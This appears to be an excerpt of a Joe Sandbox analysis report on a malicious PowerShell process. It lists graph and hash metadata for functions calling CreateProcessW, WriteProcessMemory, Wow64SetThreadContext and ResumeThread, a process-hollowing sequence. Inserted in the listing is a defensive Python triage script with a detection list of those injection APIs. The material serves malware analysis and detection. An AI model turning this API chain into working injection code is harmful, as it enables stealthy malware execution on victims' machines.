                                                                                                                                  Total number of Nodes:28
                                                                                                                                  Total number of Limit Nodes:5
                                                                                                                                  execution_graph 7942 437d40 7943 437d90 WriteProcessMemory 7942->7943 7944 437d88 7942->7944 7945 437dcb 7943->7945 7944->7943 7946 4354e0 7948 4354f3 7946->7948 7947 435534 7948->7947 7951 436531 7948->7951 7956 436790 7948->7956 7953 43659e 7951->7953 7952 43672a 7952->7948 7953->7952 7961 436f58 7953->7961 7965 436ea8 ResumeThread 7953->7965 7958 4367a9 7956->7958 7957 436801 7957->7948 7958->7957 7959 436f58 ResumeThread 7958->7959 7960 436ea8 ResumeThread 7958->7960 7959->7958 7960->7958 7962 436f66 7961->7962 7963 436ea8 ResumeThread 7962->7963 7964 4368d1 7962->7964 7963->7964 7964->7953 7966 4368d1 7965->7966 7966->7953 7967 437988 7968 437a03 CreateProcessW 7967->7968 7970 437ae1 7968->7970 7971 437bc8 7972 437c14 Wow64SetThreadContext 7971->7972 7973 437c0a 7971->7973 7974 437c42 7972->7974 7973->7972

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 43745c-4374c9 2 4374cb-4374d5 0->2 3 43750e-437517 0->3 4 4374d7-4374e9 2->4 5 43751a-437528 2->5 3->5 6 4374eb-4374f9 4->6 7 43752e-437531 4->7 8 437597-4375a9 5->8 9 43752a-43752b 5->9 10 4374fb-437509 6->10 11 43753e-437551 6->11 12 437533-437535 7->12 13 437576-437579 7->13 23 4375aa-4375ac 8->23 9->7 10->3 17 437553-437565 11->17 18 437596 11->18 14 437537-437539 12->14 15 43757a-43757d 12->15 21 43753b-43753d 14->21 22 43757e-437595 14->22 15->22 17->23 24 437567-437569 17->24 18->8 21->11 22->18 26 4375ae-4375b0 23->26 25 43756b-43756d 24->25 24->26 30 4375b2-437a01 25->30 31 43756f-437575 25->31 26->30 32 437a03-437a06 30->32 33 437a09-437a10 30->33 31->13 32->33 34 437a12-437a18 33->34 35 437a1b-437a31 33->35 34->35 36 437a33-437a39 35->36 37 437a3c-437adf CreateProcessW 35->37 36->37 39 437ae1-437ae7 37->39 40 437ae8-437b60 37->40 39->40 47 437b72-437b79 40->47 48 437b62-437b68 40->48 49 437b90 47->49 50 437b7b-437b8a 47->50 48->47 52 437b91 49->52 50->49 52->52
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00437ACC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: d9560b2372878cb7d9bfb74832e7fe53e83dd1b1931631aee27b09243ce3411b
                                                                                                                                  • Instruction ID: 9d744be53f3d06ffca83eef9de996f1ea225d1ce1cbde258d9fd7473bad7baa1
                                                                                                                                  • Opcode Fuzzy Hash: d9560b2372878cb7d9bfb74832e7fe53e83dd1b1931631aee27b09243ce3411b
                                                                                                                                  • Instruction Fuzzy Hash: BBA1E6B180D3859FDB22CF64CCA07D9BFB0EF06210F1595DBC885A7192D738594ACB66

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 53 83102d-831030 54 831032-831034 53->54 55 831036-83103e 53->55 54->55 56 831040-831046 55->56 57 831056-83105a 55->57 58 83104a-831054 56->58 59 831048 56->59 60 831060-831064 57->60 61 8311bb-8311c5 57->61 58->57 59->57 64 831077 60->64 65 831066-831075 60->65 62 8311d3-8311d9 61->62 63 8311c7-8311d0 61->63 67 8311db-8311dd 62->67 68 8311df-8311eb 62->68 69 831079-83107b 64->69 65->69 70 8311ed-83120b 67->70 68->70 69->61 71 831081-8310a1 69->71 77 8310a3-8310be 71->77 78 8310c0 71->78 79 8310c2-8310c4 77->79 78->79 79->61 81 8310ca-8310cc 79->81 82 8310ce-8310da 81->82 83 8310dc 81->83 85 8310de-8310e0 82->85 83->85 85->61 86 8310e6-831106 85->86 89 831108-83110e 86->89 90 83111e-831122 86->90 91 831112-831114 89->91 92 831110 89->92 93 831124-83112a 90->93 94 83113c-831140 90->94 91->90 92->90 95 83112e-83113a 93->95 96 83112c 93->96 97 831147-831149 94->97 95->94 96->94 99 831161-8311b8 97->99 100 83114b-831151 97->100 102 831153 100->102 103 831155-831157 100->103 102->99 103->99
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: @#e$@#e
                                                                                                                                  • API String ID: 0-2837462967
                                                                                                                                  • Opcode ID: e76924eee93355f0538016e51ecd0cd15b2386f758e2aa47831cd6b0091bb0a1
                                                                                                                                  • Instruction ID: 132d0f1e7629d534d357184d07fbd2759f0af7470b8e363b8adcccd3f6105dca
                                                                                                                                  • Opcode Fuzzy Hash: e76924eee93355f0538016e51ecd0cd15b2386f758e2aa47831cd6b0091bb0a1
                                                                                                                                  • Instruction Fuzzy Hash: 1D4126357042068BDF281A7598252BEB3A2FBD0B14F30847ACA55CB280DF75CC81C7E2

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 104 437574-437579
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00437ACC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 882e93410ef258c3e5ec1532127a667f51103cc99f3c2bcceaacb76785589b6a
                                                                                                                                  • Instruction ID: 51bcd4bad4e70e5c5435a53edf399d9c21f80d3bba9362dafc5e4d1911ef6e7a
                                                                                                                                  • Opcode Fuzzy Hash: 882e93410ef258c3e5ec1532127a667f51103cc99f3c2bcceaacb76785589b6a
                                                                                                                                  • Instruction Fuzzy Hash: 59616AB19093598FDB22CF68C890BDDBBB0AF09304F1584EBD949AB251D7345A89CF61

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 107 437988-437a01 108 437a03-437a06 107->108 109 437a09-437a10 107->109 108->109 110 437a12-437a18 109->110 111 437a1b-437a31 109->111 110->111 112 437a33-437a39 111->112 113 437a3c-437adf CreateProcessW 111->113 112->113 115 437ae1-437ae7 113->115 116 437ae8-437b60 113->116 115->116 123 437b72-437b79 116->123 124 437b62-437b68 116->124 125 437b90 123->125 126 437b7b-437b8a 123->126 124->123 128 437b91 125->128 126->125 128->128
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00437ACC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 076b1a72e4afbb7e3ec9063249921c505323e89272fdfe0a9e5833a599fa9440
                                                                                                                                  • Instruction ID: 5fecd73e6297e3fa95938dfaf3dfc1dea4c701290b07b7489af39d5a8292346d
                                                                                                                                  • Opcode Fuzzy Hash: 076b1a72e4afbb7e3ec9063249921c505323e89272fdfe0a9e5833a599fa9440
                                                                                                                                  • Instruction Fuzzy Hash: DA5115B1D012199FEF25CF95C980BDEBBB5BF48304F1085AAE909B7250D7759A88CF60

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 160 437d3e-437d86 161 437d90-437dc9 WriteProcessMemory 160->161 162 437d88-437d8e 160->162 163 437dd2-437df3 161->163 164 437dcb-437dd1 161->164 162->161 164->163
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00437DBC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: fd0b6cf971d219642dafaaec8be495e391d58b3fa9559d17726afb9cd6b7fbbf
                                                                                                                                  • Instruction ID: 37de9b9c1b618b3a88d343d467d8a57232f963541a3e920bd563fcac4d8be626
                                                                                                                                  • Opcode Fuzzy Hash: fd0b6cf971d219642dafaaec8be495e391d58b3fa9559d17726afb9cd6b7fbbf
                                                                                                                                  • Instruction Fuzzy Hash: 3C21E4B19002499FDB10CFAAD985BEEBBF4FF48310F50842AE458A7250D378A944CF65

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 166 437d40-437d86 167 437d90-437dc9 WriteProcessMemory 166->167 168 437d88-437d8e 166->168 169 437dd2-437df3 167->169 170 437dcb-437dd1 167->170 168->167 170->169
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00437DBC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: 2395a8a6bfd13d7d6a33027627a1aac6803bac3d198e965f108a2f5aaaa40682
                                                                                                                                  • Instruction ID: 0add6a87df727e8b194cea2befcc5fdcb85381f42a6b6599427c4ec0ef99a021
                                                                                                                                  • Opcode Fuzzy Hash: 2395a8a6bfd13d7d6a33027627a1aac6803bac3d198e965f108a2f5aaaa40682
                                                                                                                                  • Instruction Fuzzy Hash: C221B4B19003599FDB10CF9AD985BDEBBF4FF48310F50842AE558A7250D378A944CBA5

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 172 437bc0-437c08 173 437c14-437c40 Wow64SetThreadContext 172->173 174 437c0a-437c12 172->174 175 437c42-437c48 173->175 176 437c49-437c6a 173->176 174->173 175->176
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00437C33
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: 5d5afdc7515e9d5c77791594949a33b1a674cc0991b881cc60fe7b9cf36776ad
                                                                                                                                  • Instruction ID: 1efd74aecfa3c2645a10f2db5b3c3b73996fd54cd4a96afc61278bdc20cc8f2d
                                                                                                                                  • Opcode Fuzzy Hash: 5d5afdc7515e9d5c77791594949a33b1a674cc0991b881cc60fe7b9cf36776ad
                                                                                                                                  • Instruction Fuzzy Hash: FF1159B6D046498FDB20CFAAD944BDEFBF4EB88320F24816AD458A3341D3789545CF65

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 178 437bc8-437c08 179 437c14-437c40 Wow64SetThreadContext 178->179 180 437c0a-437c12 178->180 181 437c42-437c48 179->181 182 437c49-437c6a 179->182 180->179 181->182
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00437C33
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: 7fca75a9d93582877fe5fbe120c72bf805d45e20941108d6af8c230f517630d7
                                                                                                                                  • Instruction ID: d392b122b272db431ad955fbb6449e742b1fbc2499072b4a35f80a9b7232cb88
                                                                                                                                  • Opcode Fuzzy Hash: 7fca75a9d93582877fe5fbe120c72bf805d45e20941108d6af8c230f517630d7
                                                                                                                                  • Instruction Fuzzy Hash: 401104B2D006498FDB20CFAAC944BDEFBF4EB88320F55842AD458A3340D378A545CFA5

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 184 436f58-436f68 call 431824 187 436ea8-436ee6 ResumeThread 184->187 188 436f6e-436f7c 184->188 191 436ee8-436eee 187->191 192 436eef-436efc 187->192 189 436f82-436f85 188->189 190 43694d-436950 188->190 189->190 193 437250-437259 190->193 194 436956-43704d 190->194 191->192 195 436f02-436f13 192->195 196 4373fb-437402 192->196 198 437308-437328 193->198 199 43725f-437272 193->199 202 437059-437062 194->202 203 43704f-437054 194->203 195->190 200 436f19-436f1c 195->200 211 437333-437336 198->211 212 43732a-43732f 198->212 199->190 199->198 200->190 202->198 206 437068-43706b 202->206 203->190 206->198 208 437071-437092 206->208 208->190 213 437098-43709b 208->213 214 437353-43736a 211->214 215 437338 211->215 212->211 213->190 214->211 224 43736c 214->224 215->214 216 437398-43739d 215->216 217 43733f-43734d 215->217 218 43736e-437377 215->218 226 4373cf-437450 216->226 217->211 219 43734f-437351 217->219 221 437379-437383 218->221 222 43739f-4373c1 218->222 219->211 228 437385-43738a 221->228 229 43738c-437396 call 4352dc 221->229 231 4368d1-4368d4 222->231 232 4373c7-4373ca 222->232 224->211 228->211 229->216 238 437331 229->238 234 4373d4-4373ed 231->234 235 4368da 231->235 232->226 232->231 234->231 236 4373f3-4373f6 234->236 235->235 236->231 238->211
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: 6731f69c8a6a9f281b615b26deb179ab0e1d229d85b71bf2489a8cfd52d6b8d2
                                                                                                                                  • Instruction ID: 11f275c8874ff4451c2688206da9e045def505e2e286057a87fe718106920025
                                                                                                                                  • Opcode Fuzzy Hash: 6731f69c8a6a9f281b615b26deb179ab0e1d229d85b71bf2489a8cfd52d6b8d2
                                                                                                                                  • Instruction Fuzzy Hash: 60118C74904349DFEB20CF14C948B9AB7B2BF49319F2291D6D4085B3A2C7789D89CF19

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 239 436ea8-436ee6 ResumeThread 240 436ee8-436eee 239->240 241 436eef-436efc 239->241 240->241 242 436f02-436f13 241->242 243 4373fb-437402 241->243 245 436f19-436f1c 242->245 246 43694d-436950 242->246 245->246 247 437250-437259 246->247 248 436956-43704d 246->248 249 437308-437328 247->249 250 43725f-437272 247->250 252 437059-437062 248->252 253 43704f-437054 248->253 261 437333-437336 249->261 262 43732a-43732f 249->262 250->246 250->249 252->249 256 437068-43706b 252->256 253->246 256->249 258 437071-437092 256->258 258->246 263 437098-43709b 258->263 264 437353-43736a 261->264 265 437338 261->265 262->261 263->246 264->261 274 43736c 264->274 265->264 266 437398-43739d 265->266 267 43733f-43734d 265->267 268 43736e-437377 265->268 276 4373cf-437450 266->276 267->261 269 43734f-437351 267->269 271 437379-437383 268->271 272 43739f-4373c1 268->272 269->261 278 437385-43738a 271->278 279 43738c-437396 call 4352dc 271->279 281 4368d1-4368d4 272->281 282 4373c7-4373ca 272->282 274->261 278->261 279->266 288 437331 279->288 284 4373d4-4373ed 281->284 285 4368da 281->285 282->276 282->281 284->281 286 4373f3-4373f6 284->286 285->285 286->281 288->261
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_430000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: eb358fbe2d832c74e0ae7c35f6ac21db4df2842c3dbbb45376c697149c333595
                                                                                                                                  • Instruction ID: e011b9f1dcf125381e965b8981a72f6c281e10d1aafcef5a3eb09d2e26f663f9
                                                                                                                                  • Opcode Fuzzy Hash: eb358fbe2d832c74e0ae7c35f6ac21db4df2842c3dbbb45376c697149c333595
                                                                                                                                  • Instruction Fuzzy Hash: CF016974904358DFEB20CF64C948799BBB1EB09319F2190CAD4496B392C7794989DF16
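The Wow64SetThreadContext and ResumeThread functions listed above sit in the same PowerShell dump region (0000000C...430000.sdmp) and are consistent with the tail of a process-hollowing sequence (rewrite the suspended thread's context, then resume it), which matches the "Injects a PE file into a foreign processes" signature. The following Python is an added example, not Joe Sandbox output or code from the sample: it parses entries in this listing's format and reports (a) which hollowing-chain Win32 calls appear per dump region and (b) which listed functions share basic blocks. The sample text is constructed from three entries on this page, cut to the lines the parser reads; the HOLLOWING_APIS set is the editor's own choice of primitives, not a Joe Sandbox definition. On this page the two Wow64SetThreadContext entries differ only in the start address of their first block (437bc0 vs 437bc8), which the overlap check surfaces.

```python
"""Parse per-function entries of a Joe Sandbox disassembly listing and report
hollowing-chain APIs per dump region plus functions that share basic blocks."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: three entries from this report's PowerShell (PID 12) listing,
# indentation removed and cut to the lines the parser uses; the third graph is
# truncated to its first five blocks. Every entry ends at 'Instruction Fuzzy Hash'.
SAMPLE_REPORT = """\
control_flow_graph 172 437bc0-437c08 173 437c14-437c40 Wow64SetThreadContext 172->173 174 437c0a-437c12 172->174 175 437c42-437c48 173->175 176 437c49-437c6a 173->176 174->173 175->176
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00437C33
• Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
• Opcode ID: 5d5afdc7515e9d5c77791594949a33b1a674cc0991b881cc60fe7b9cf36776ad
• Instruction Fuzzy Hash: FF1159B6D046498FDB20CFAAD944BDEFBF4EB88320F24816AD458A3341D3789545CF65
control_flow_graph 178 437bc8-437c08 179 437c14-437c40 Wow64SetThreadContext 178->179 180 437c0a-437c12 178->180 181 437c42-437c48 179->181 182 437c49-437c6a 179->182 180->179 181->182
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00437C33
• Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
• Opcode ID: 7fca75a9d93582877fe5fbe120c72bf805d45e20941108d6af8c230f517630d7
• Instruction Fuzzy Hash: 401104B2D006498FDB20CFAAC944BDEFBF4EB88320F55842AD458A3340D378A545CFA5
control_flow_graph 239 436ea8-436ee6 ResumeThread 240 436ee8-436eee 239->240 241 436eef-436efc 239->241 240->241 242 436f02-436f13 241->242 243 4373fb-437402 241->243
APIs
• Source File: 0000000C.00000002.407011836.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
• Opcode ID: eb358fbe2d832c74e0ae7c35f6ac21db4df2842c3dbbb45376c697149c333595
• Instruction Fuzzy Hash: CF016974904358DFEB20CF64C948799BBB1EB09319F2190CAD4496B392C7794989DF16
"""

# Editor's choice of calls that together form a hollowing sequence:
# create suspended, unmap/alloc, write image, rewrite thread context, resume.
HOLLOWING_APIS = {"CreateProcessA", "CreateProcessW", "NtUnmapViewOfSection",
                  "VirtualAllocEx", "WriteProcessMemory", "SetThreadContext",
                  "Wow64SetThreadContext", "ResumeThread"}
NODE_RE = re.compile(r"(?<![\w>-])\d+ ([0-9a-f]{4,})-([0-9a-f]{4,})")  # '173 437c14-437c40'
EDGE_RE = re.compile(r"\d+->\d+")                                      # '172->173'
API_LINE_RE = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")


@dataclass
class FunctionEntry:
    source_file: str = ""
    opcode_id: str = ""
    blocks: dict[int, int] = field(default_factory=dict)  # block start -> end address
    api_at: dict[int, str] = field(default_factory=dict)  # block start -> API named in its label
    api_calls: list[tuple[str, str, str]] = field(default_factory=list)  # (api, module, ref)

    def apis(self) -> set[str]:
        return {a for a, _, _ in self.api_calls} | set(self.api_at.values())


def parse_cfg(line: str, entry: FunctionEntry) -> None:
    """Read block ranges and the API names Joe Sandbox writes into block labels."""
    nodes = list(NODE_RE.finditer(line))
    for i, m in enumerate(nodes):
        start = int(m.group(1), 16)
        entry.blocks[start] = int(m.group(2), 16)
        seg_end = nodes[i + 1].start() if i + 1 < len(nodes) else len(line)
        for lab in EDGE_RE.sub("", line[m.end():seg_end]).split():
            if lab[0].isupper():  # 'call 431824' is lower-case; API names are not
                entry.api_at[start] = lab


def parse_entries(text: str) -> list[FunctionEntry]:
    entries, cur, in_apis = [], FunctionEntry(), False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("control_flow_graph "):
            parse_cfg(line, cur)
            continue
        if line == "APIs":
            in_apis = True
            continue
        if in_apis and (m := API_LINE_RE.match(line)):
            cur.api_calls.append((m.group(1), m.group(2), m.group(4)))
            continue
        in_apis = False
        if line.startswith("• Source File: "):
            cur.source_file = line.split(": ", 1)[1].split(",")[0]
        elif line.startswith("• Opcode ID: "):
            cur.opcode_id = line.split(": ", 1)[1]
        elif line.startswith("• Instruction Fuzzy Hash:"):  # last field of every entry
            entries.append(cur)
            cur = FunctionEntry()
    return entries


def hollowing_apis_by_region(entries):
    """Dump region -> sorted hollowing-chain APIs reached from functions in it."""
    found = defaultdict(set)
    for e in entries:
        found[e.source_file] |= e.apis() & HOLLOWING_APIS
    return {k: sorted(v) for k, v in found.items() if v}


def overlapping_functions(entries):
    """(opcode-id prefix, opcode-id prefix, shared block count) for entry pairs
    whose graphs contain identical basic blocks, i.e. likely one function dumped twice."""
    out = []
    for i, a in enumerate(entries):
        for b in entries[i + 1:]:
            shared = sum(1 for s, e in a.blocks.items() if b.blocks.get(s) == e)
            if shared:
                out.append((a.opcode_id[:12], b.opcode_id[:12], shared))
    return out


if __name__ == "__main__":
    ents = parse_entries(SAMPLE_REPORT)
    print(hollowing_apis_by_region(ents), overlapping_functions(ents))
```

Run against the full listing (paste the report's disassembly section in place of SAMPLE_REPORT), the region map is the quick triage view: a region whose functions reach both a context-rewrite call and ResumeThread is where the injected payload's loader lives, and the overlap list tells you which of the many near-identical entries are the same code rather than separate functions.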
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d9732208265ac812ef9e1be5eb76945412ef68f16beea6faafea0f4437e718c2
                                                                                                                                  • Instruction ID: 4b2c51e4ee933d6060858a0f0cc544f43ae1f880b7af8d06a317e84dcb7f540d
                                                                                                                                  • Opcode Fuzzy Hash: d9732208265ac812ef9e1be5eb76945412ef68f16beea6faafea0f4437e718c2
                                                                                                                                  • Instruction Fuzzy Hash: 5821F23160D3C55FCF029FB498657A97FA1BF96200F1C81AAE9848F0D7DB249816C7A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.406963759.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 75f0600fbe3f864cc5fe06e7f2fbcccaec61ae8663c55c314721f8d3673add8b
                                                                                                                                  • Instruction ID: 2eb75a932cd73f54e827ecb65f48e74cec6097b9ac6d197899611b4d1bceefc0
                                                                                                                                  • Opcode Fuzzy Hash: 75f0600fbe3f864cc5fe06e7f2fbcccaec61ae8663c55c314721f8d3673add8b
                                                                                                                                  • Instruction Fuzzy Hash: 6F01A271504340AFEB104F26ECC4B67FB98EF41764F2C855AFD494B286C37A9845CAB2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.406963759.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bc79e81a7fdba639ff39f5aa63251550d4baab74e3a912e3247e636ba8c9b844
                                                                                                                                  • Instruction ID: 16a244534757f22fd543cd8b753dabc2033c45730f3fbdaf39176ad18cab7365
                                                                                                                                  • Opcode Fuzzy Hash: bc79e81a7fdba639ff39f5aa63251550d4baab74e3a912e3247e636ba8c9b844
                                                                                                                                  • Instruction Fuzzy Hash: FFF0CD71504340AFEB108E16DCC4B66FBA8EB81724F28C05AFD484B286C37A9C44CAB2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 53256cb87c1ee8bf34112a36583d76e8ff150595d5bd6fb5644677dc97805fcf
                                                                                                                                  • Instruction ID: b3dcb0904899a0c9f7c57eec8461a3b3b3faee43d95dccb50cc71c67fa517fa0
                                                                                                                                  • Opcode Fuzzy Hash: 53256cb87c1ee8bf34112a36583d76e8ff150595d5bd6fb5644677dc97805fcf
                                                                                                                                  • Instruction Fuzzy Hash: A8F01C7150D3C08FC7025B108C65A11BF71BFA6205F1A80CB8485CE1A3D6259C06D7A6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: df8c8ee0a986b985d1487916b6cc2dd1b2f4c30c07aba03d0bedd027afc84920
                                                                                                                                  • Instruction ID: 5acbb07ccabbe84038e4fdef5b0b764241a8ef0b4f1fdfd64dd3782fd5e9e071
                                                                                                                                  • Opcode Fuzzy Hash: df8c8ee0a986b985d1487916b6cc2dd1b2f4c30c07aba03d0bedd027afc84920
                                                                                                                                  • Instruction Fuzzy Hash: 2AE09274204181CBD759AA64C801D52BB72FFEA314B18848ED4458F26BEA31DC43CB66
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
